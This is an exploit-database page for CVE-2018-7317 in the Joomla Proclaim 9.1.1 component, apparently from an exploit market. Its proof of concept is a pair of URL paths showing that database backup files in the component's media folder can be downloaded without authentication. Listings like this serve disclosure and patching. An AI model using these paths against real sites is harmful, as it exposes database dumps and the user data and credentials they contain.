[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Proclaim 9.1.1 Component - Backup File Download Vulnerability

Author
Ihsan Sencan
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-29865
Category
web applications
Date add
22-02-2018
CVE
CVE-2018-7317
Platform
php
# # # #
# Exploit Title: Joomla! Component Proclaim 9.1.1 - Backup Download
# Vendor Homepage: https://www.christianwebministries.org/
# Software Link: https://extensions.joomla.org/extensions/extension/living/religion/proclaim/
# Software Download: https://github.com/Joomla-Bible-Study/Joomla-Bible-Study/releases/download/v9.1.1/pkg_proclaim.zip
# Version: 9.1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-7317
# # # #
# Exploit Author: Ihsan Sencan
# # # #
# 
# POC: 
# 
# 1)
# http://localhost/[PATH]/media/com_biblestudy/backup/
# 
# http://localhost/[PATH]/media/com_biblestudy/backup/Joomla375_jbs-db-backup_2018_February_22_1518955684.sql
# 
# # # #

#  0day.today [2024-12-26]  #